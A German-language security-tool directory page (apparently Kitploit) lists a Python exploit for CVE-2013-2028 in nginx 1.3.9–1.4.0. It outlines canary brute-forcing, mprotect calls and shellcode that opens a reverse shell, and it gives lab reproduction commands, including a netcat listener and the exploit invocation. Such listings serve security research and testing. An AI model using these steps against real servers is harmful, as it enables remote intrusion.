Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/m4drat/cve-2013-2028-exploit
SchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsPayload-EntwicklungBinary-Exploitation
GitHubm4drat/cve-2013-2028-exploit

CVE-2013-2028-Exploit

CVE-2013-2028 python Exploit

Repository anzeigen
1922vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2013-2028 Exploit

Details zur Schwachstelle

Verwundbare Software: Nginx 1.3.9 < 1.4.0
Commit mit Fix: https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7

Die Schwachstelle existiert in der Funktion ngx_http_parse_chunked. Dieser Exploit löst einen Integer-Overflow in ngx_http_parse_chunked aus und nutzt diesen anschließend, um den Stack zu überlaufen und den Kontrollfluss zu übernehmen.

Details zur Ausnutzung

Der eigentliche Exploit besteht aus 4 Schritten:

  1. Ermittle den Wert des Stack-Canarys per Byte-für-Byte-Bruteforce
  2. Berechne die Adresse von mprotect mithilfe des Werts aus rcx (zeigt irgendwo in lpthread). Rufe mprotect mit den passenden Argumenten auf.
  3. Kopiere den Shellcode an eine RWX-Speicherstelle.
  4. Springe zum Shellcode und starte eine Reverse Shell.

So lässt es sich reproduzieren

  1. Starte einen Listener auf dem Hostsystem, zum Beispiel mit netcat: nc -lvp 4345
  2. Starte auf der virtuellen Maschine Docker: sudo docker-compose up --build
  3. Führe den Exploit aus: python2 exploit.py -ra 127.0.0.1 -rp 8081 -la <listener machine address> -lp <listener machine port>
Tool herunterladen
  • Lass den Exploit den tatsächlichen Wert des Canarys finden und starte die Reverse Shell.
  • Demo